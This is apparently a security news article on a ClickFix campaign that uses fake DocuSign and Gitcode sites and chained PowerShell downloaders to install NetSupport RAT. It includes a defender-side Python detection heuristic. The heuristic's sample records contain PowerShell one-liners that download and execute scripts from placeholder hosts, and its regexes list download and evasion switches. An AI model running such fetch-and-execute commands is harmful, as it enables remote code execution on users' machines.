New Threat: Multi-Stage PowerShell Attack Targeting Users
Overview of the Campaign
Recent alerts from threat hunters indicate an ongoing campaign that leverages deceptive websites to lure users into executing harmful PowerShell scripts. This series of attacks primarily targets individuals through social engineering tactics to stealthily install NetSupport RAT (Remote Access Trojan) malware on their devices.
Malicious Scripts on Fake Sites
The DomainTools Investigations (DTI) team reports detecting “malicious multi-stage downloader PowerShell scripts” on counterfeit websites posing as reputable services such as Gitcode and DocuSign. The deception begins when users are tricked into copying an initial PowerShell script and executing it through the Windows Run dialog.
Once executed, this initial script downloads a second downloader script, which in turn retrieves further malicious payloads and ultimately installs the NetSupport RAT on the compromised system.
Distribution Methods
The counterfeit websites are suspected to be promoted through social engineering over email and various social media platforms, tactics that present unsuspecting users with a false appearance of legitimacy.
The PowerShell scripts found on these fraudulent Gitcode sites are specifically designed to sequentially download additional PowerShell scripts from an external server, namely “tradingviewtool[.]com”. The execution of these scripts is a crucial step toward deploying the NetSupport RAT on affected machines.
Use of CAPTCHA for User Deception
DomainTools also uncovered multiple websites mimicking DocuSign (for instance, docusign.sa[.]com) that deliver the same malware, but with an additional layer of trickery. These sites employ ClickFix-style CAPTCHA verifications, asking users to prove they are not bots.
This process is not merely a benign check; once users engage with the CAPTCHA, an obfuscated PowerShell command is secretly copied to the clipboard. Users are then prompted to open the Windows Run dialog, paste the command, and hit Enter, inadvertently executing the malicious script.
Persistence Strategy of the Malware
The script’s main objective is to download a persistence script named “wbdims.exe” from GitHub, which ensures the malware runs automatically every time the user logs in. Although the payload was unavailable during DomainTools’ investigation, DomainTools noted that it checks back with the delivery site (“docusign.sa[.]com/verification/c.php”).
When it does, the site triggers a browser refresh that delivers a second-stage PowerShell script; this script in turn downloads and executes a ZIP payload, requesting it with the URL parameter “an” set to “2”. Unpacking the archive yields an executable named “jp2launcher.exe,” which lays the groundwork for the installation of NetSupport RAT.
Complexity of the Attack Chain
The multi-layered design of these scripts is likely intended to evade detection and to make the operation more resilient to security investigations and takedown efforts. Each script downloading the next produces a long execution chain that is hard to trace back to its origin.
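The two behaviours the article describes, PowerShell launched from the Run dialog with a pasted one-liner and PowerShell repeatedly spawning PowerShell to fetch the next stage, leave a recognisable trail in process-creation telemetry. The following is an added defender-side example, not code from DomainTools or from the campaign: a small heuristic over constructed Sysmon-style records in which all hosts (`*.example.invalid`) and paths are placeholders.

```python
# Added heuristic triage for the ClickFix / chained-downloader pattern described above.
# Fields follow Sysmon Event ID 1 naming; every record below is a constructed sample.
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str

# Cmdlets/aliases that pull or evaluate remote content (one stage fetching the next).
REMOTE_FETCH = re.compile(r"\b(iwr|iex|curl|wget)\b|invoke-webrequest|invoke-expression"
                          r"|downloadstring|downloadfile|net\.webclient", re.I)
# Switches that hide the console or sidestep policy, typical of pasted one-liners.
EVASION_FLAGS = re.compile(r"-(w(indowstyle)?\s+hidden|nop(rofile)?\b|enc(odedcommand)?\b"
                           r"|e(xecution)?p(olicy)?\s+bypass)", re.I)

def is_ps(path):
    return path.lower().endswith(("\\powershell.exe", "\\pwsh.exe"))

def score_event(ev):
    """Return the independent reasons this launch resembles the campaign's chain."""
    reasons, cmd = [], ev.command_line
    if ev.parent_image.lower().endswith("\\explorer.exe") and is_ps(ev.image):
        reasons.append("PowerShell started from explorer.exe (Run dialog / pasted clipboard)")
    if is_ps(ev.parent_image) and is_ps(ev.image) and REMOTE_FETCH.search(cmd):
        reasons.append("PowerShell spawning PowerShell that fetches more code (downloader chain)")
    if REMOTE_FETCH.search(cmd):
        reasons.append("command line fetches or evaluates remote content")
    if EVASION_FLAGS.search(cmd):
        reasons.append("hidden-window / encoded / policy-bypass switches")
    return reasons

def triage(events, threshold=2):
    """Alert only when at least `threshold` reasons stack; one alone is routine admin noise."""
    scored = ((ev, score_event(ev)) for ev in events)
    return [(ev, r) for ev, r in scored if len(r) >= threshold]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed; *.example.invalid are placeholder hosts
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              'powershell -w hidden -c "iwr https://stage1.example.invalid/a.ps1 | iex"'),
    ProcEvent(PS, PS, "powershell -nop -c \"(New-Object Net.WebClient)"
                      ".DownloadString('https://stage2.example.invalid/b.ps1') | iex\""),
    ProcEvent(r"C:\Windows\explorer.exe", PS, r"powershell Get-ChildItem C:\Users"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", PS,
              r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
]
```

`triage(SAMPLE_EVENTS)` flags only the first two records (the Run-dialog launch and the stage-two fetch), while the interactive directory listing and the scheduled backup script each trip a single rule and stay below the threshold.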
Association with Past Campaigns
While the direct perpetrators of this scheme remain unidentified, DomainTools noted striking similarities in the delivery URLs, domain names, and registration patterns with a campaign linked to SocGholish (also known as FakeUpdates), which surfaced in October 2024.
It’s worth mentioning that while the NetSupport Manager is a legitimate administrative tool, its misuse as a RAT by various threat groups—including FIN7, Scarlet Goldfinch, and Storm-0408—affirms the ongoing risk posed by such attacks.
Closing Thoughts
As cyber threats continue to evolve, the methods of infiltration are becoming increasingly sophisticated. Users should remain vigilant against such tactics, maintaining updated security measures while being cautious of unsolicited links and requests for script execution. Staying informed about emerging threats is vital in safeguarding personal and professional digital environments.